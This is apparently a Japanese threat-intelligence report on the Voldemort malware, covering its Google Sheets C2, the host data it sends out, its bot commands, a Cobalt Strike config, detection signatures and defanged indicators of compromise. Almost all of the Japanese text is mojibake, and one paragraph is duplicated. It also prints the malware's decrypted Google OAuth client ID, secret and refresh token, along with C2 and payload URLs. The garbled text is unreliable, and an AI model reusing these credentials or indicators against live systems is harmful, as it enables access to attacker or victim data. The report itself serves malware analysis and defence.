ã³ãŒã«ããã¯ã¯ãWindows APIãåŒã³åºã颿°ã®äžã§åŒã³åºãããæååã埩å·ãã颿°ã§ãã
解決ããã颿°ãåŒã³åºããåŒæ°ãã¹ã¿ãã¯ã«ä¿æããã¹ã¿ã
Cobalt Strikeã®ã·ã§ã«ã³ãŒãã¯ããªãŸã«ããæ¢ããŠãã颿°ãåŒã³åºãã ãã§ãªãããã®é¢æ°ããªãŸã«ããããã¯ããã¯ããã䜿ããŸãã
æååã埩å·ããããã«ããã®ãã«ãŠã§ã¢ã¯XTEAã«éåžžã«ãã䌌ãã¢ã«ãŽãªãºã ã«äŸåããŠããŸããããããã¯åŸ©å·ã®ã«ãŒããåãé€ãããã«å±éãããŠããŸãã
埩å·ã¢ã«ãŽãªãºã
å±éãããã¢ã«ãŽãªãºã ã¯ä»¥äžã®éãïŒ
å±éãããã¢ã«ãŽãªãºã
åæäžããã«ãŒããã€ã³ãã¯ãã®ã¢ã«ãŽãªãºã ãéæšæºçã§ããããšãçºèŠããããããšãã¥ã¬ãŒã·ã§ã³ææ³ãçšããŠåã蟌ãŸããæååã埩å·ããŸããã
MrExodiaã«ããçŽ æŽãããããŒã«Dumpulator ãå©çšããã°ãx64dbgã§ãã«ãŠã§ã¢ã®ãã³ããäœæãããããPythonç°å¢å ã®ã«ã¹ã¿ã ã»ããŒã«ãšããŠäœ¿ãããšãã§ããŸãã
æååã埩å·ããããã®Dumpulatorã®äœ¿ãæ¹ã瀺ãPythonã³ãŒã
ããã«ãã£ãŠãæ¯èŒçã·ã³ãã«ã§Windowsã®å éšã«äŸåããªã颿°ããã«ãŠã§ã¢å ã§åŒã³åºãããšãã§ããŸããããã«ã¯ãä»ã®åŒã³åºããè¡ãããããŒã¿ã倿ããã ãã®é¢æ°ãé©ããŠããŸãã
Pythonã¹ã¯ãªããã¯ãšãã¥ã¬ãŒã·ã§ã³ã䜿çšããŠæååã®åŸ©å·ãå®è£ ããæåŸã«æå·åãããå å®¹ãæžã蟌ãã å²ãåœãŠã¡ã¢ãªãŒãã埩å·åãããæååãèªã¿åãããšãã§ããŸãããã®ã³ãŒããDLLã®ããŒã¿ã»ã¯ã·ã§ã³å šäœã§å®è¡ãããšããµã³ãã«å ã®ãã¹ãŠã®åŸ©å·åãããæååãåŸãããŸãïŒ
埩å·åãããæåå
APIã³ãŒã«ã解決ããããšããã«ãŠã§ã¢ã¯èªèº«ã®ã³ã³ãã£ã®ã¥ã¬ãŒã·ã§ã³ã埩å·åããããšã§ç¶è¡ããŸããæå·åãããã³ã³ãã£ã®ã¥ã¬ãŒã·ã§ã³ãžã®çŽæ¥ã®åç §ãä¿åããä»ã®ãã«ãŠã§ã¢ãšã¯ç°ãªãããã®ãã«ãŠã§ã¢ã¯èªèº«ã®ãã¡ã€ã«ããæ€çŽ¢ããæååãå«ãã§ããŸãã
âg00 "ã§ç€ºãããæå·åãããã³ã³ãã£ã®ã¥ã¬ãŒã·ã§ã³ã®éå§
次ã®4ãã€ãã¯ã³ã³ãã£ã°ã®é·ãã瀺ããæ®ãã®ããŒã¿ã¯å®è¡ãã¡ã€ã«åãCiscoCollabHost.exeãã䜿ã£ãXORæå·ã«ãã£ãŠåŸ©å·ãããŸãããã®ããŒã¿ã埩å·ãããšããã«ãŠã§ã¢ãã³ãã³ãïŒã³ã³ãããŒã«ïŒC2ïŒãµãŒããŒãšéä¿¡ããããã«å¿ èŠãªããŒãåŸãããŸããæ¬¡ã®è¡šã¯ãã³ã³ãã£ã®ã¥ã¬ãŒã·ã§ã³ããé¢é£ãã埩å·åãããæååã瀺ããŠããŸãã
test |
962194083343-nevo9pjnlr7cgirjs1eonpebakrlq3qc.apps.googleusercontent.com |
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 |
1//0eg8RBquaRQvhCgYIARAAGA4SNwF-L9IrSsPADLEx_CMsoJYspPSfaoeUbxii4xLVK10CafejzYAEBi2IptPt9KpwO7vphUTPFtest |
962194083343-nevo9pjnlr7cgirjs1eonpebakrlq3qc.apps.googleusercontent.com |
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 |
1//0eg8RBquaRQvhCgYIARAAGA4SNwF-L9IrSsPADLEx_CMsoJYspPSfaoeUbxii4xLVK10CafejzYAEBi2IptPt9KpwO7vphUTPF28 |
ãã«ãŠã§ã¢ã¯ãå°çšã®ã€ã³ãã©ã䟵害ãããã€ã³ãã©ã䜿çšããã®ã§ã¯ãªããC2ãããŒã¿æµåºããªãã¬ãŒã¿ãŒããã®ã³ãã³ãå®è¡ã®ããã«Google ã¹ãã¬ããã·ãŒãã®ã€ã³ãã©ãå©çšããŸãã
ãã®æç¹ã§ããã«ãŠã§ã¢ã¯C2ãšã®éä¿¡ãéå§ããããã«å¿ èŠãªæ å ±ããã¹ãŠå ¥æããŠããããã«ãŠã§ã¢ã¯ã¯ã©ã€ã¢ã³ãã»ããŒã¯ã³ã䜿ã£ãŠGoogle ã¹ãã¬ããã·ãŒãã䜿çšããŠãããããGoogle ã·ãŒãã«ããŒã¿ãæžã蟌ãåã«èªèšŒãè¡ãå¿ èŠããããŸãã
Google ããã¢ã¯ã»ã¹ããŒã¯ã³ãååŸãã POST ãªã¯ãšã¹ã
ã¯ã©ã€ã¢ã³ãIDãã¯ã©ã€ã¢ã³ãã»ã·ãŒã¯ã¬ããããªãã¬ãã·ã¥ã»ããŒã¯ã³å€ã¯ã埩å·ãããã³ã³ãã£ã®ã¥ã¬ãŒã·ã§ã³ããåãåºãããã¢ã¯ã»ã¹ããŒã¯ã³ãåãåãããã«éä¿¡ãããŸãã
Googleããã¢ã¯ã»ã¹ããŒã¯ã³ãååŸããçãªã¯ãšã¹ã
ã¢ã¯ã»ã¹ããŒã¯ã³ãååŸãããã«ãŠã§ã¢ã¯ããããçšã®ã³ãã³ããå«ãæå®ãããGoogle ã¹ãã¬ããã·ãŒããèªãããšãã§ããŸãã
C2ãšããŠæ©èœããã·ãŒãããããŒã¿ãèªã¿åãã³ãŒã
ã·ãŒããèªã¿åãããã®æåã®ãªã¯ãšã¹ãã¯ãèªèº«ã®ããŒã¿ãã©ãã«æžã蟌ããããã§ãã¯ããããã«è¡ãããŸããUUIDãè¿ãããå Žåããã®ã»ããå ã«ãã§ã«è¢«å®³è ã®ããŒã¿ãããããšãããããŸãããã®åŸãUUIDãè¿ãããªããªããŸã§ã2:2ãªã©ã®èªã¿åããç¶è¡ããŸãã以äžã¯ãUUIDãè¿ãããããšã瀺ããªã¯ãšã¹ãã§ãïŒ
ã·ãŒãããè¿ãããUUIDã瀺ãçã¬ã¹ãã³ã¹
6åç¹°ãè¿ããåŸããã«ãŠã§ã¢ãUUIDãåãæ»ããªããã°ããã«ãŠã§ã¢ã¯æ¢åã®ãããããŒã¿ãäžæžãããããšãªãããããã®ã»ã«ã«èªç±ã«æžã蟌ãããšãã§ããããšã瀺ããŠããŸãã
UUIDãè¿ãããªãããšã瀺ãçã®å¿ç
æå³ããªãçµæãšããŠãã»ã«ãå埩ãããã®ã«ãŒãã¯ãæå®ãããGoogleã·ãŒãå ã«äœäººã®ç ç²è ããããã瀺ããŠããŸãã
ãã«ãŠã§ã¢ã¯ããŒã¿ãæžã蟌ããã»ã«ãèŠã€ãããšã6è¡ç®ã«ãã¹ãæ å ±ã®é åãéããŸãïŒ
Google ã·ãŒãã«ãã¹ãæ å ±ãã¢ããããŒããããããã®çã®ãªã¯ãšã¹ã
以äžã®è¡šã«ããã®ãªã¯ãšã¹ãã«å«ãŸããæ³šç®ãã¹ããã£ãŒã«ãã®ããã€ãã瀺ããŸãããã®ãªã¯ãšã¹ãå ã®ã»ãšãã©ã®å€ã¯base64ã§ãšã³ã³ãŒããããRC4ããŒãšããŠå®è¡ãã¡ã€ã«ã®ãã¡ã€ã«åã䜿çšããŠRC4ã§æå·åãããŸãïŒäŸ: "CiscoCollabHost.exe"ïŒïŒ
Bot UUID |
Local IP |
Hostname |
Username |
Program Files list |
Program Files (x86) list |
Environment Variables |
Filename of executable |
Infection Timestamp |
ãã£ãŒã«ãã®èª¬æ
ãã«ãŠã§ã¢ã®ãã®æç¹ã§ãæ»æè ã¯Googleã·ãŒãçµç±ã§ãããã«ã³ãã³ããçºè¡ã§ããŸãããã«ãŠã§ã¢ããµããŒãããã³ãã³ãã¯ä»¥äžã®éãïŒ
- Ping
- Dir
- Download
- Upload
- Exec
- Copy
- Move
- Sleep
- Exit
ãããã¯ãã¹ãŠãæäœãæåãããåŠãã瀺ãç¬èªã®ã¹ããŒã¿ã¹ã»ã¡ãã»ãŒãžãšããã«ãŠã§ã¢ã®ãªãŒã¯åãVoldemortãã䌎ã£ãŠããŸãã
ã³ãã³ãå®è¡ã«é¢é£ããã¹ããŒã¿ã¹ã¡ãã»ãŒãžã®åŸ©å·
Googleãæ¢çŽ¢
ãã«ãŠã§ã¢ãéä¿¡ãããã³ã«ãšããŠæšæºçãªãµãŒãã¹ã䜿çšããŠããããã®ãµãŒãã¹ãGoogle ã¹ãã¬ããã·ãŒãããããŒã¿ãèªã¿åãããã«ã¯ã©ã€ã¢ã³ãIDãšã¯ã©ã€ã¢ã³ãã·ãŒã¯ã¬ãããå ¬éããŠããããšã確èªããåŸãã©ã®ãããªæ å ±ãå©çšå¯èœãã確èªããããã«ãæå®ãããGoogle ã¹ãã¬ããã·ãŒããæ¢çŽ¢ãã䟡å€ããããšæããŸããã以äžã®Pythonã³ãŒãã«ãããGoogle ã¹ãã¬ããã·ãŒãetã«ãã¹ãæ å ±ãéä¿¡ãããŸã§ã«è³ã£ãã¢ã¯ãã£ããªææããã¹ãŠç¹å®ããŸãããåèšã§ãåèš6ã€ã®è¢«å®³è ãã·ãŒãã§èŠ³æž¬ãããã®ãã¡ã®1ã€ãé€ããã¹ãŠããµã³ãããã¯ã¹ãŸãã¯æ¢ç¥ã®ãªãµãŒãã£ãŒã§ããã
Google ã·ãŒãããããŒã¿ãèªã¿èŸŒãæ¹æ³ã玹ä»ããPythonã³ãŒã
Googleã·ãŒãå ã®ä»ã®ããŒãžãæ¢çŽ¢ããããšã§ãã¹ãã¬ããã·ãŒãã«ç»é²ãããŠããå°æ°ã®ãããã«ã€ããŠãæ»æè çµç±ã§å®è¡ãããã³ãã³ãã確èªããããšãã§ããŸãããæ»æè ãçžäºäœçšãã被害è ãã·ã³ããšã«ããã¹ãåïŒãŠãŒã¶ãŒåãååãšããæ°ããããŒãžãäœæãããŸãããã®èšäºãæžããŠããæç¹ã§ã¯ãæ»æè ã¯2ã€ã®ãã£ã¬ã¯ããªã®ãã£ã¬ã¯ããªãªã¹ãã衚瀺ããã³ãã³ãããå®è¡ããŠããŸããã§ããã Googleã·ãŒãå ã®ä»ã®ããŒãžãæ¢çŽ¢ããããšã§ãã¹ãã¬ããã·ãŒãã«ç»é²ãããŠããå°æ°ã®ãããã«ã€ããŠãæ»æè çµç±ã§å®è¡ãããã³ãã³ãã確èªããããšãã§ããŸãããæ»æè ãçžäºäœçšãã被害è ãã·ã³ããšã«ããã¹ãåïŒãŠãŒã¶ãŒåãååãšããæ°ããããŒãžãäœæãããŸãããã®èšäºãæžããŠããæç¹ã§ã¯ãæ»æè ã¯2ã€ã®ãã£ã¬ã¯ããªã®ãã£ã¬ã¯ããªãªã¹ãã衚瀺ããã³ãã³ãããå®è¡ããŠããŸããã§ããã
Google ã¹ãã¬ããã·ãŒãã®é²èЧããèªã¿è§£ããããšãããšã«ãç§ãã¡ã¯ãããã®ä»çµã¿ãä»ã«äœãèªãããšãã§ããã®ãèŠãå¿ èŠæ§ãæãããSheetãªãŒããŒãšåããããªPythonã³ãŒããGoogle Driveã®èªã¿èŸŒã¿ã«äœ¿ã£ãŠã¿ããšãè峿·±ãçµæãåŸãããŸããããã®ããã«ã¯ãã©ã«ãIDãå¿ èŠã§ãã幞éãªããšã«ãSheet IDãšåæ§ã«ããã®Drive IDã¯ææãããã·ã³ãDriveã«èå³ã®ãããã¡ã€ã«ãã¢ããããŒãããããã®èšå®ã«åã蟌ãŸããŠããŸããã
Google Driveå ã®ãã¡ã€ã«ãäžèŠ§è¡šç€ºããPythonã³ãŒã
ãã®ã¹ã¯ã¬ã€ãã³ã°ã«ããããã©ã«ããŒã®å å®¹å šäœãç §äŒããç¹å®ã®ã¢ããããŒãããããã¡ã€ã«ãããŠã³ããŒãããããšãã§ããããã®äœæ¥ãããæã ã¯ä»¥äžã®ãã¡ã€ã«ãç¹å®ããŸããïŒ
- API (Google Sheet used for C2)
- 7za.exe (7z executable)
- Test.7z (Password protected 7z)
远å ã®ãã©ã«ã:
- V1 [2023]
- V2 [2023]
- V1 [2023]
ãããã®ãã£ã¬ã¯ããªã«ã¯ãOpenWRT ãã¡ãŒã ãŠã§ã¢ã»ã³ãŒãã«é¢é£ãããã¬ãŒãã³ã°è³æãå«ãŸããŠããŸããã
æ»æè ã®Google Driveã®ãã£ã¬ã¯ããªåºå
ãããã®ãã¡ãŒã ãŠã§ã¢ã®ç»åã«å ããŠã以äžã®ãããª1æã®åçããããŸããïŒ
OpenWRTã®GUI
ãã«ãŒããã€ã³ãã®ãªãµãŒãã£ãŒã¯ããããã®ãã¡ã€ã«ã被害è ã®ããããšã察話ããããã«äœ¿çšãããŠããªãã®ã確èªããŠããŸãããã®ããããããã®ãã¡ã€ã«ã®ç®çã¯äžæã§ãããããã®ãã¡ã€ã«ã¯ãè¡çºè ãè¡ã£ãä»ã®æŽ»åã®æ®ãã§ããå¯èœæ§ããããŸãã
ã°ãŒã°ã«ã»ãã©ã€ãå ã®test.7zãšãããã¡ã€ã«ã¯ããã¹ã¯ãŒãã§ä¿è·ããã7-zipã¢ãŒã«ã€ãã§ãããã¹ã¯ãŒãã¯æããã«ãããŠããªãããäžè¬çã«èŠ³æž¬ãããŠãããã¹ã¯ãŒã "test123 "ã§ã¢ãŒã«ã€ãã¯ç°¡åã«åŸ©å·ãããŸããããã®ã¢ãŒã«ã€ãã«ã¯DLLãšå®è¡ãã¡ã€ã«ãå«ãŸããŠããŸããã
æ»æè ã«ãã£ãŠã¢ããããŒãããããã¹ããã¡ã€ã«ã瀺ããã£ã¬ã¯ããªäžèЧ
å®è¡ãã¡ã€ã« "Shuaruta.exe "ã¯ãDLLã®ãµã€ãããŒãã£ã³ã°ã«è匱ãªããäžã€ã®å®è¡ãã¡ã€ã«ã§ããShuaruta.exeããã°ã©ã ã¯ãGoèšèªã§æžãããåã«Cobalt Strike BeaconãããŒããããnvdaHelperRemote.dllãããµã€ãããŒãããããã«äœ¿ãããå¯èœæ§ããããŸãã幞éãªããšã«ãGoãã€ããªã®éçºè ã¯ã·ã³ãã«ãšãããã°æ å ±ã䜿ã£ãŠãããã³ã³ãã€ã«ããŸããã
Cobalt Strike ãæ³šå ¥ããããã® Go ãã€ããªã«å«ãŸãããããã°åºå
ããã«ãããæœåšçãªãŠãŒã¶ãŒå (yOIR) ãš DLL ãã³ã³ãã€ã«ãããææã®æ å ±ãåŸãããŸããæåŸã«ãCobalt Strike ããŒã³ã³èªèº«ããèšå®ãæœåºãããšã以äžã®é¢é£ãã£ãŒã«ããåŸãããŸããïŒ
DOMAINS: ['autodiscover[.]iitt[.]eu[.]org']
URIS: ['/ows/v1/OutlookCloudSettings/settings/global']
WATERMARK: 987654321
USERAGENT: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64;Trident/6.0)
ãã®Cobalt Strikeæ§æã®éããã¯ããœãããŠã§ã¢ã®ã¯ã©ãã¯ãããããŒãžã§ã³ã«é¢é£ããŠããŸãããã®éããã¯ããªãŒãã³ãœãŒã¹ã¬ããŒãã®è€æ°ã®ç¡é¢ä¿ãªè
åšã§èгå¯ãããŠããŸããeu[.]orgãã¡ã€ã³ã¯ãéå¶å©å£äœã«ç¡æã®ãµããã¡ã€ã³ãæäŸããäžè¬ã«å©çšå¯èœãªãã¡ã€ã³ã§ãã
ã¢ããªãã¥ãŒã·ã§ã³ïŒæ»æè ã®çŽã¥ãïŒ
ãã«ãŒããã€ã³ã瀟ã§ã¯ããã®æŽ»åãæ¢ç¥ã®æ»æã°ã«ãŒããšã¯æå®ããŠããŸããããã«ãŠã§ã¢ã®æ©èœæ§ãã·ãŒãã調æ»ããéã«èгå¯ãããåéããŒã¿ãããæ å ±åéããã®æ»æãã£ã³ããŒã³ã®ç®çã®1ã€ã§ãã£ããšèããããŸãããã£ã³ããŒã³ã®ç¹åŸŽã®å€ãã¯ãµã€ããŒç¯çœªã®è åšæŽ»åãšäžèŽããŠããŸãããç§ãã¡ã¯ãããã¯ãŸã äžæãªæçµç®çãæ¯æŽããããã«è¡ãããã¹ãã€æŽ»åã§ããå¯èœæ§ãé«ããšè©äŸ¡ããŠããŸãã
ãã©ã³ã±ã³ã·ã¥ã¿ã€ã³ã®ããã«å·§åŠã«æŽç·Žãããæ©èœãšãéåžžã«åºæ¬çãªãã¯ããã¯ãæ©èœãçµã¿åããããŠãããããè
åšè¡çºè
ã®èœåã®ã¬ãã«ãè©äŸ¡ããããšã¯é£ããããã£ã³ããŒã³ã®æçµçãªç®æšãé«ãä¿¡é Œæ§ãæã£ãŠæ±ºå®ããããšã¯å°é£ã§ãã倧éã®é»åã¡ãŒã«ã䜿çšããŠãå®éã®æšçãç®ç«ããªããããå¯èœæ§ããããŸãããæ»æè
ãäœåãã®çµç¹ãçŽç²ã«ææããããã£ãå¯èœæ§ãåæ§ã«ãããŸãããŸããããŒã«ã®éçºãåæã¢ã¯ã»ã¹ã«é¢ããããŸããŸãªã¬ãã«ã®çµéšãæã€è€æ°ã®æ»æè
ããã®æŽ»åã«åãçµãã å¯èœæ§ããããŸããå
šäœãšããŠãããã¯éåžžã«ç¹ç°çãªæ»æãã£ã³ããŒã³ãšãªã£ãŠããŸãã
ãªããããéèŠãªã®ã
ãã®è¡åã«ã¯ãè€æ°ã®ãµã€ããŒç¯çœªã®æ»æè ããåæã¢ã¯ã»ã¹ã®ãšã³ã·ã¹ãã å šäœã§ç¶ç¶çãªå®éšã®äžç°ãšããŠåæ§ã®ãã¯ããã¯ã䜿çšããŠãããè€æ°ã®ã°ãã°ãã®ãã£ã³ããŒã³ã§èгå¯ãããæè¿æµè¡ããŠããããŸããŸãªãã¯ããã¯ãçµã¿åããããŠããŸãããã®æ»æãã£ã³ããŒã³ã§äœ¿çšããããã¯ããã¯ã®å€ãã¯ããµã€ããŒç¯çœªã®çŸå Žã§ããé »ç¹ã«èгå¯ãããŠãããã¹ãã€æŽ»åã®çããæãããŠããæ»æè ã¯ãééçãªåæ©ãæã€æ»æè ãšåãTTPã䜿çšããããšãå€ãããšã瀺ããŠããŸãã
ãã®æŽ»åã¯ã¹ãã€æŽ»åãšäžèŽããŠããããã«èŠããŸããããã®è åšã¯ã©ã¹ã¿ãŒã«é¢é£ããä»åŸã®æŽ»åã«ãã£ãŠããã®è©äŸ¡ãå€ããå¯èœæ§ããããŸãããã®å Žåããµã€ããŒç¯çœªè¡çºè ã¯ãå žåçãªé»åç¯çœªã®é ä¿¡ç¹æ§ãããã€ã瀺ãäžæ¹ã§ãçŸåšéå¶è ã ããå©çšå¯èœã§ãåºç¯ãªãã£ã³ããŒã³ã§ã¯æªçšãããŠããªãçããæ©èœãåããã«ã¹ã¿ãã€ãºããããã«ãŠã§ã¢ã䜿çšãããŸããééçåæ©ã«åºã¥ããã£ã³ããŒã³ã§ã¯éåžžèŠãããªãéåžžã«ç¹æ®ãªæšçãèšå®ããŠããããšã«ãªããŸãã
芳å¯ãããè¡åã«å¯Ÿããé²åŸ¡ã«ã¯ãå€éšãã¡ã€ã«å ±æãµãŒãã¹ãžã®ã¢ã¯ã»ã¹ãæ¢ç¥ã®ã»ãŒããªã¹ã察象ãµãŒããŒã®ã¿ã«å¶éããããšãTryCloudflareãžã®ãããã¯ãŒã¯æ¥ç¶ãæ¥åäžå¿ èŠãªãå Žåã¯ãããã¯ããããšãã¹ã¯ãªããã§ã®search-msã®äœ¿çšããLNKãPowerShellã®å®è¡ãªã©ã®äžå¯©ãªåŸç¶è¡åãç£èŠããŠèŠåããããšãªã©ãå«ãŸããŸãã
ãã«ãŒããã€ã³ã瀟ã¯ãæ¬ã¬ããŒãã«æ²èŒãããŠãããµãŒãã¹ãæªçšããè¡çºã«ã€ããŠããµã€ããŒã»ãã¥ãªãã£æ¥çã®åæ¥ãã³ããŒã«æ å ±æäŸããŠããŸãã
Emerging Threats ã·ã°ããã£
2857963 - ETPRO HUNTING GoogleSheets API V4 Activity (Fetch Single Cell with A1 Notation)
2857964 - ETPRO HUNTING GoogleSheets API V4 Response (Single Cell with UUID)
2857976 - ETPRO HUNTING GoogleSheets API V4 Activity (Possible Exfil)
2858210 - ETPRO MALWARE Voldemort System Info Exfil
IoC (Indicators of compromise / äŸµå®³ææš)
Indicator |
Description |
First Observed |
hxxps://pubs[.]infinityfreeapp[.]com/SA150_Notes_2024[.]html |
Redirect Target / Landing Page |
2024-08-12 |
hxxps://pubs[.]infinityfreeapp[.]com/IRS_P966[.]html |
Redirect Target / Landing Page |
2024-08-06 |
hxxps://pubs[.]infinityfreeapp[.]com/Notice_pour_remplir_la_N%C2%B0_2044[.]html |
Redirect Target / Landing Page |
2024-08-13 |
hxxps://pubs[.]infinityfreeapp[.]com/La_dichiarazione_precompilata_2024[.]html |
Redirect Target / Landing Page |
2024-08-05 |
hxxps://pubs[.]infinityfreeapp[.]com/Steuerratgeber[.]html |
Redirect Target / Landing Page |
2024-08-13 |
hxxps://od[.]lk/s/OTRfNzQ5NjQwOTJf/test[.]png |
Python Payload (Renamed ZIP containing Voldemort) |
2024-08-05 |
hxxps://od[.]lk/s/OTRfODQ1Njk2ODVf/2044_4765[.]pdf |
Python Payload (Decoy PDFs) |
2024-08-05 |
hxxps://od[.]lk/s/OTRfODM5Mzc3NjFf/irs-p966[.]pdf |
Python Payload (Decoy PDFs) |
2024-08-06 |
hxxps://od[.]lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024[.]pdf |
Python Payload (Decoy PDFs) |
2024-08-05 |
hxxps://od[.]lk/s/OTRfODQ1NDc2MjZf/SA150_Notes_2024[.]pdf |
Python Payload (Decoy PDFs) |
2024-08-12 |
hxxps://od[.]lk/s/OTRfODQ1NzA0Mjlf/einzelfragen_steuerbescheinigungen_de[.]pdf |
Python Payload (Decoy PDFs) |
2024-08-13 |
hxxp://83[.]147[.]243[.]18/p/ |
pingb.in base URL |
2024-08-05 |
3fce52d29d40daf60e582b8054e5a6227a55370bed83c662a8ff2857b55f4cea |
test.png/zip SHA256 |
2024-08-05 |
561e15a46f474255fda693afd644c8674912df495bada726dbe7565eae2284fb |
CiscoSparkLauncher.dll SHA256 (Voldemort Malware) |
2024-08-05 |
6bdd51dfa47d1a960459019a960950d3415f0f276a740017301735b858019728 |
CiscoCollabHost.exe SHA256 (Benign file used for side-loading) |
2024-08-05 |
pants-graphs-optics-worse[.]trycloudflare[.]com |
TryCloudflare Tunnel Hostname |
2024-08-05 |
ways-sms-pmc-shareholders[.]trycloudflare[.]com |
TryCloudflare Tunnel Hostname |
2024-08-05 |
recall-addressed-who-collector[.]trycloudflare[.]com |
TryCloudflare Tunnel Hostname |
2024-08-05 |
hxxps://sheets[.]googleapis[.]com:443/v4/spreadsheets/16JvcER-0TVQDimWV56syk91IMCYXOvZbW4GTnb947eE/ |
Voldemort C2 |
2024-08-05 |
hxxps://resource[.]infinityfreeapp[.]com/ABC_of_Tax[.]html |
Redirect Target / Landing Page |
2024-08-19 |
hxxps://resource[.]infinityfreeapp[.]com/0023012-317[.]html |
Redirect Target / Landing Page |
2024-08-19 |
hxxps://od[.]lk/s/OTRfODQ4ODE4OThf/logo[.]png |
Python Payload (Renamed ZIP containing Voldemort) |
2024-08-19 |
hxxps://od[.]lk/s/OTRfODQ5MzQ5Mzlf/ABC_of_Tax[.]pdf |
Python Payload (Decoy PDFs) |
2024-08-19 |
0b3235db7e8154dd1b23c3bed96b6126d73d24769af634825d400d3d4fe8ddb9 |
logo.png/zip SHA256
|
2024-08-19 |
fa383eac2bf9ad3ef889e6118a28aa57a8a8e6b5224ecdf78dcffc5225ee4e1f |
CiscoSparkLauncher.dll Hash (Voldemort Malware) |
2024-08-19 |
invasion-prisoners-inns-aging[.]trycloudflare[.]com |
TryCloudflare Tunnel Hostname |
2024-08-19 |